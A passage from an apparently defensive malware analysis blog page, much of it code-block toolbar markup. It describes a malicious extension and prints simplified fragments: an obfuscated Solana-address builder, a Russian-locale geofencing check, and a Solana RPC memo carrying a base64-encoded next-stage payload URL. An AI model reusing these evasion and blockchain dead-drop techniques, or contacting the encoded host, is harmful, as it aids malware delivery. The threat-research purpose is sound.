stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_836aaf146c05ae4cc898fb7f0dd8372e\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_836aaf146c05ae4cc898fb7f0dd8372e\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">\/\/ resolves to:\r\n\/\/ 6YGcuyFRJKZtcaYCCFba9fScNUvPkGXodXE1mJiSzqDJ\r\n\r\nfunction y(C, s, S, V) {\r\n  return D(C - -0x380, s);\r\n}\r\n\r\nfunction x(C, s, S, V) {\r\n  return D(s - 0x40, S);\r\n}\r\n\r\nconst solanaAddress =\r\n  x(0x1da, 0x1f0, &#039;&amp;sYe&#039;, 0x230) +\r\n  y(-0x185, &#039;MxE^&#039;, -0x150, -0x196) +\r\n  y(-0x17b, &#039;vx&amp;D&#039;, -0x122, -0x196) +\r\n  y(-0x1ae, &#039;cRN$&#039;, -0x202, -0x19a) +\r\n  x(0x25e, 0x256, &#039;g^B&amp;&#039;, 0x22f);\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Regional checks<\/h3>\n\n\n\n<p>Before continuing, the loader checks whether the system looks like it belongs to a user in Russia. It examines environment variables, language and locale settings, timezone information, and the UTC offset for signs of a Russian environment. That includes values like <kbd>ru_RU<\/kbd>, <kbd>ru-RU<\/kbd>, <kbd>Russian<\/kbd>, and <kbd>russian<\/kbd>, as well as timezones and UTC offsets commonly associated with Russia. Altogether, these checks suggest the loader is designed to avoid execution on systems linked to Russia.<\/p>\n\n\n\n<p>This pattern is common among threat actors who operate from within Russian territories, as it avoids attracting in-country investigation. It\u2019s much easier for an attacker\u2019s own country to investigate and prosecute an attacker than it is for a foreign country. However, this signal should not be taken as conclusive proof or attribution.<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"javascript\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_d9de5ac0ac76b977023f0c02a303a9e7\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_d9de5ac0ac76b977023f0c02a303a9e7\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\" selected>JavaScript<\/option>\n                        <option value=\"json\">JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-javascript\">function T() {\r\n  let localeIndicators = [\r\n    os.userInfo().username,\r\n    process.env.LANGUAGE,\r\n    process.env.LANG,\r\n    process.env.LC_ALL,\r\n    Intl.DateTimeFormat().resolvedOptions().locale\r\n  ].some(v =&gt; v &amp;&amp; \/ru_RU|ru-RU|Russian|russian\/i.test(v));\r\n\r\n  let timezoneIndicators = [\r\n    Intl.DateTimeFormat().resolvedOptions().timeZone,\r\n    new Date().toString()\r\n  ];\r\n\r\n  let russianTimezones = [\r\n    &quot;Europe\/Moscow&quot;,\r\n    &quot;Europe\/Samara&quot;,\r\n    &quot;Asia\/Novosibirsk&quot;,\r\n    &quot;Asia\/Yekaterinburg&quot;,\r\n    &quot;Asia\/Omsk&quot;,\r\n    &quot;Asia\/Krasnoyarsk&quot;,\r\n    &quot;Asia\/Irkutsk&quot;,\r\n    &quot;Asia\/Vladivostok&quot;,\r\n    &quot;Asia\/Magadan&quot;,\r\n    &quot;Asia\/Kamchatka&quot;,\r\n    &quot;Asia\/Anadyr&quot;,\r\n    &quot;MSK&quot;\r\n  ];\r\n\r\n  let timezoneMatch = timezoneIndicators.some(v =&gt;\r\n    v &amp;&amp; russianTimezones.some(tz =&gt; v.toLowerCase().includes(tz.toLowerCase()))\r\n  );\r\n\r\n  let utcOffset = -new Date().getTimezoneOffset() \/ 60;\r\n  let offsetMatch = utcOffset &gt;= 2 &amp;&amp; utcOffset &lt;= 12;\r\n\r\n  return localeIndicators &amp;&amp; (timezoneMatch || offsetMatch);\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<h3 class=\"wp-block-heading\">Memo-based payload discovery<\/h3>\n\n\n\n<p>The RPC response returns transactions with JSON in the memo field. The malware reads that data to identify the next-stage location, so it can fetch payload infrastructure from the blockchain instead of storing it directly inside the extension.<\/p>\n\n\n\n<p>Partial memo:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"json\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-download\" aria-label=\"Download code as file\" title=\"Download\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M11 14.3333V1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M21 14.3335V18.7779C21 19.3673 20.7659 19.9325 20.3491 20.3493C19.9324 20.766 19.3671 21.0002 18.7778 21.0002H3.22222C2.63285 21.0002 2.06762 20.766 1.65087 20.3493C1.23413 19.9325 1 19.3673 1 18.7779V14.3335\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.44434 8.77783L10.9999 14.3334L16.5554 8.77783\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Theme Toggle Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-theme\" aria-label=\"Toggle theme\" title=\"Toggle Theme\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\" class=\"section-gutenberg-code-highlight__icon-dark\">\n                        <path d=\"M11 15C13.2091 15 15 13.2091 15 11C15 8.79086 13.2091 7 11 7C8.79086 7 7 8.79086 7 11C7 13.2091 8.79086 15 11 15Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 1V3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M11 19V21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3.92993 3.93018L5.33993 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.6599 16.6602L18.0699 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M1 11H3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M19 11H21\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M5.33993 16.6602L3.92993 18.0702\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M18.0699 3.93018L16.6599 5.34018\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" class=\"section-gutenberg-code-highlight__icon-light\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M20.9992 11.5325C20.895 13.4629 20.2339 15.3218 19.0957 16.8844C17.9576 18.4471 16.3912 19.6466 14.5859 20.3381C12.7806 21.0295 10.8137 21.1832 8.92287 20.7806C7.03207 20.378 5.29836 19.4363 3.93132 18.0694C2.56428 16.7025 1.62243 14.9689 1.21963 13.0781C0.816833 11.1874 0.970326 9.22041 1.66156 7.41502C2.35279 5.60964 3.55217 4.04311 5.1147 2.90483C6.67724 1.76654 8.53604 1.10522 10.4664 1.00081C10.9167 0.976347 11.1524 1.51227 10.9134 1.89365C10.1138 3.17292 9.77145 4.68543 9.94215 6.18433C10.1129 7.68323 10.7865 9.08002 11.8533 10.1468C12.92 11.2135 14.3168 11.8872 15.8157 12.0579C17.3146 12.2286 18.8271 11.8862 20.1064 11.0866C20.4888 10.8476 21.0237 11.0822 20.9992 11.5325Z\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Open External Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-external\" aria-label=\"Open in new window\" title=\"Open External\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"21\" height=\"21\" viewbox=\"0 0 21 21\" fill=\"none\">\n                        <path d=\"M13.6665 1H19.9998V7.33333\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M8.38892 12.6111L20 1\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M16.8333 11.5559V17.8892C16.8333 18.4491 16.6109 18.9861 16.215 19.382C15.8191 19.7779 15.2821 20.0003 14.7222 20.0003H3.11111C2.55121 20.0003 2.01424 19.7779 1.61833 19.382C1.22242 18.9861 1 18.4491 1 17.8892V6.2781C1 5.7182 1.22242 5.18123 1.61833 4.78532C2.01424 4.38941 2.55121 4.16699 3.11111 4.16699H9.44444\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n            <\/div>\n            <div class=\"section-gutenberg-code-highlight__toolbar-right\">\n                <!-- Language Selector -->\n                <div class=\"section-gutenberg-code-highlight__language-selector\">\n                    <label for=\"language-select-block_8d3f4ae4d197dc4f20a34b140920fe3f\" class=\"section-gutenberg-code-highlight__language-label\">Language:<\/label>\n                    <select id=\"language-select-block_8d3f4ae4d197dc4f20a34b140920fe3f\" class=\"section-gutenberg-code-highlight__language-dropdown\" aria-label=\"Select code language\">\n                        <option value=\"auto\">Auto-detect<\/option>\n                        <option value=\"plaintext\">Plain Text<\/option>\n                        <option value=\"bash\">Bash<\/option>\n                        <option value=\"css\">CSS<\/option>\n                        <option value=\"dockerfile\">Dockerfile<\/option>\n                        <option value=\"go\">Go<\/option>\n                        <option value=\"html\">HTML<\/option>\n                        <option value=\"java\">Java<\/option>\n                        <option value=\"javascript\">JavaScript<\/option>\n                        <option value=\"json\" selected>JSON<\/option>\n                        <option value=\"kotlin\">Kotlin<\/option>\n                        <option value=\"markdown\">Markdown<\/option>\n                        <option value=\"php\">PHP<\/option>\n                        <option value=\"python\">Python<\/option>\n                        <option value=\"ruby\">Ruby<\/option>\n                        <option value=\"rust\">Rust<\/option>\n                        <option value=\"sql\">SQL<\/option>\n                        <option value=\"swift\">Swift<\/option>\n                        <option value=\"typescript\">TypeScript<\/option>\n                        <option value=\"xml\">XML<\/option>\n                        <option value=\"yaml\">YAML<\/option>\n                    <\/select>\n                <\/div>\n            <\/div>\n        <\/div>\n\n        <!-- Code Container -->\n        <div class=\"section-gutenberg-code-highlight__container\">\n            <!-- Line Numbers (generated by JS) -->\n            <div class=\"section-gutenberg-code-highlight__line-numbers\" aria-hidden=\"true\">\n                <!-- Line numbers will be generated dynamically by JavaScript -->\n            <\/div>\n\n            <!-- Code Block -->\n            <pre class=\"section-gutenberg-code-highlight__pre\"><code class=\"section-gutenberg-code-highlight__code language-json\">{\r\n  &quot;jsonrpc&quot;: &quot;2.0&quot;,\r\n  &quot;result&quot;: [\r\n    {\r\n      &quot;blockTime&quot;: 1772540446,\r\n      &quot;confirmationStatus&quot;: &quot;finalized&quot;,\r\n      &quot;err&quot;: null,\r\n      &quot;memo&quot;: &quot;[79] {\\&quot;link\\&quot;:\\&quot;aHR0cDovLzQ1LjMyLjE1MC4yNTEvOGdCd3hFcTRodmF1OGhydGVIUXNFUSUzRCUzRA==\\&quot;}&quot;,\r\n      &quot;signature&quot;: &quot;2zJq487NsyNPZP3kAjUC76jayqjivVH5bJBELSCKSaNa49XJgoUmz3bp6Y9A9NZFZ8V86YVAogdziNu6ao2Z1AYW&quot;,\r\n      &quot;slot&quot;: 403936731\r\n    }\r\n  ],\r\n  &quot;id&quot;: 1\r\n}\r\n\r\n\/\/ Note: this snippet was simplified from the original for readability.<\/code><\/pre>\n        <\/div>\n        <!-- Status Message -->\n        <div class=\"section-gutenberg-code-highlight__status\" role=\"status\" aria-live=\"polite\"><\/div>\n    <\/div>\n<\/section>\n\n\n\n<p>The extension then extracts the first memo value and resolves it to:<\/p>\n\n\n<section class=\"section-gutenberg-code-highlight light-theme\" data-theme=\"light\" data-syntax=\"color\" data-language=\"json\">\n    <div class=\"section-gutenberg-code-highlight__wrapper\">\n        <!-- Toolbar -->\n        <div class=\"section-gutenberg-code-highlight__toolbar\">\n            <div class=\"section-gutenberg-code-highlight__toolbar-left\">\n                <!-- Copy Button -->\n                <button class=\"section-gutenberg-code-highlight__btn section-gutenberg-code-highlight__btn-copy\" aria-label=\"Copy code to clipboard\" title=\"Copy\">\n                    <svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"22\" height=\"22\" viewbox=\"0 0 22 22\" fill=\"none\">\n                        <path d=\"M19 7H9C7.89543 7 7 7.89543 7 9V19C7 20.1046 7.89543 21 9 21H19C20.1046 21 21 20.1046 21 19V9C21 7.89543 20.1046 7 19 7Z\" stroke-width=\"2\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                        <path d=\"M3 15C1.9 15 1 14.1 1 13V3C1 1.9 1.9 1 3 1H13C14.1 1 15 1.9 15 3\" stroke=\"currentColor\" stroke-width=\"2\" stroke-linecap=\"round\" stroke-linejoin=\"round\"><\/path>\n                    <\/svg>\n                <\/button>\n\n                <!-- Download Button 